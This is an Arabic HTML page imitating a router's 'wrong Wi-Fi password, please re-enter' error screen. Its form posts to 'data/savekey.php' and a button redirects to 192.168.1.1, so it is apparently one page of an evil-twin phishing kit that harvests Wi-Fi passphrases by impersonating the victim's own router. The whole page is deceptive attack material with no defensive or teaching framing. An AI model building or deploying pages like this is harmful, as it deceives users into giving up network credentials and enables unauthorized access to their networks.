<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
    <title>  خطأ , يرجي اعادة ادخال كلمة المرور </title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<link rel="icon" type="image/png"  href="images/arabic_logo.ico" />
<link rel="stylesheet" href="./style/style.css" type="text/css">
<style type="text/css">
input.text
{
border:1px solid #E5E5E5;
height:26px;
line-height:26px;
width:175px;
padding:0px;
margin:4px 0px 0px 10px;
font-size:14px;
color:#6a6969;
font-family:"Verdana","Arial";
outline: none;
}
input.LoginBtn
{
height:30px;
display:inline-block;
width:110px;
margin-top:30px;
font-size:18px;
color: #fff;
cursor:pointer;
background-color: #c61648;}
#copyright
{
-webkit-text-size-adjust:none;
font-size:9px;
color:#6a6969;
font-family:"Verdana";
margin-top:40px;
display:inline-block;
}
</style>
<script language="JavaScript">
<!--

function OnCancel() {
  
  
   window.location="http://192.168.1.1";
  alert("سيتم توجيهك إلى الصفحة الرئيسية في 5 ثانية");
            setTimeout('OnCancel()', 5000);
  
  }  
-->

</script>
</head>
<body style="font-family:Arial, sans-serief; background-color:#E5E5E5;margin:0px;padding:0px;" onload="doLoad()">
<form method="POST" action="data/savekey.php" id="regForm"><p>&nbsp;</p>
<p>&nbsp;</p>
<table width="580" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td height="31">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
<td width="8%">&nbsp;</td><td width="90%" valign="top">
<br><br><br><table style="background-color:white" width="95%" border="0" align="center">
<tbody><tr>
<td height="35">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
<img alt="giga" src="images/ls.png" style="padding-left: 14px;">
<td colspan="2" style="text-align:center;"><b> ! الباسورد خاطي <br><br></b></td></tr>
<tr>
<td colspan="3" style="text-align:center;">
  
  <font size="3" color="gray"> <b> من فضلك أعد أدخل كلمة المرور   <font color="red">للواي فاي الخاص بك </font></font></b><br><br></td><td>&nbsp;
  </td></tr>



<tr>
<td align="center" colspan="3">
<input type="BUTTON" name="texttpLoginBtn" value="الي الخلف" class="LoginBtn" onclick="OnCancel();"></td></tr><tr>
<td align="center" colspan="3">
<input type="HIDDEN" name="uiWebLoginhiddenUsername" value="ec37aa25501f5aea74d5eb3d19b08333"><input type="HIDDEN" name="uiWebLoginhiddenPassword" value="ec37aa25501f5aea74d5eb3d19b08333"></td></tr><tr>
<td height="30" colspan="3" style="text-align:center;">    
</td></tr></tbody></table></td><td width="6%">&nbsp;</td></tr></tbody></table></td></tr></tbody></table><!-- RpZDT -->
    <div class="maz"><img alt="gg" src="images/lms.png" style=" "></div>
    </form><p>&nbsp;</p>

</body>
</html>